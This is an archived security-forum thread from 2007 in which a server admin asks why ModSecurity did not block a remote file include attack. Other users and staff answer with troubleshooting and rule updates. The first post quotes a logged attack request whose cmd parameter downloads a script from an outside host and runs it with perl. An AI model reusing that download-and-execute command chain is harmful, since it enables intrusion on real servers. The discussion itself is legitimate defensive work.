store | blogs | forums | twitter | facebook | wiki | mailing lists | downloads | support portal
Atomic Secure Linux
It is currently Fri May 24, 2013 12:46 am

» Feed - Atomicorp

All times are UTC - 5 hours [ DST ]




Post new topic Reply to topic Share/Bookmark  [ 5 posts ] 
Author Message
 Post subject: Mod Security did not stop remote page include
Unread postPosted: Tue Oct 30, 2007 10:45 am 
Offline
Forum Regular
Forum Regular

Joined: Mon Oct 29, 2007 6:51 pm
Posts: 606
Seems like Mod Security (in ASL) doesnt stop remote file includes.

Now I know that this attack was not successful as the php options the script uses are disabled, as well as wget, GET, lwp-* and all that jazz so he was unable to download the script anyways.

But isnt Mod Sec supposed to catch these?

[Mon Oct 29 14:32:14 2007] [error] [client 201.8.172.106] PHP Fatal error: require() [<a href='function.require'>function.require</a>]: Failed opening required 'http://www.chamala.kit.net/tool25.txt?&amp;cmd=cd%20/tmp;rm%20bn.txt;wget%20http://garyz.110mb.com/bn.txt;fetch%20http://garyz.110mb.com/bn.txt;lwp-download%20http://garyz.110mb.com/bn.txt;curl%20-O%20http://garyz.110mb.com/bn.txt;lynx%20http://garyz.110mb.com/bn.txt;perl%20bn.txt' (include_path='.::.')


Top
 Profile  
 
 Post subject:
Unread postPosted: Tue Oct 30, 2007 11:16 am 
Offline
Forum Regular
Forum Regular

Joined: Mon Oct 29, 2007 6:51 pm
Posts: 606
lol I tried to post the full web log and the server "shunned" me.

In any event the request returned a status of 200 (success) and was not stopped by mod sec


Top
 Profile  
 
 Post subject:
Unread postPosted: Fri Nov 02, 2007 8:43 pm 
Offline
Long Time Forum Regular
Long Time Forum Regular

Joined: Thu Dec 09, 2004 11:19 am
Posts: 1846
There are ways of getting under the mod_sec radar. That may be the case for this particular issue.

Normally if you were to put http://anything as an argument in an URL on your server, mod_security would block it. If it isn't doing so then you need to check mod_security is actually running.

e.g. http://www.domain-on-your-server/index.php

and right after that last php you add ?blah=

and then after that http://

and then after that blah.com

(sorry - don't wan't Scott's mod_sec blocking me)

You should get mod_sec triggering

Its the first thing I do when upgrading/changing.

Also try some of the other rules, like the blogspot one in blacklists.conf


Faris.


Top
 Profile  
 
 Post subject:
Unread postPosted: Fri Nov 02, 2007 9:54 pm 
Offline
Forum Regular
Forum Regular

Joined: Mon Oct 29, 2007 6:51 pm
Posts: 606
Thanks, but Yes - mod sec has been running the entire time, I do know that for a fact as I get the alerts from ossec from the audit logs


Top
 Profile  
 
 Post subject:
Unread postPosted: Mon Nov 05, 2007 10:10 am 
Offline
Atomicorp Staff - Site Admin
Atomicorp Staff - Site Admin

Joined: Wed Dec 31, 1969 8:00 pm
Posts: 7428
Location: earth
There are a couple of new rule classes in the -4 mod_sec release in atomic-testing that get a lot deeper into that type of input validation. The best way to get these tracked is to send them to support@atomicorp.com, so we can get a case started on it. Plus as you've noticed, this server has a super strict modsec policy (its actually where we do all the new rule testing) and emailing it to support wont shun you like posting to the forums will.


Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic Share/Bookmark  [ 5 posts ] 

» Feed - Atomicorp

All times are UTC - 5 hours [ DST ]


Who is online

Users browsing this forum: Google [Bot] and 1 guest


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for:
Jump to:  
Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group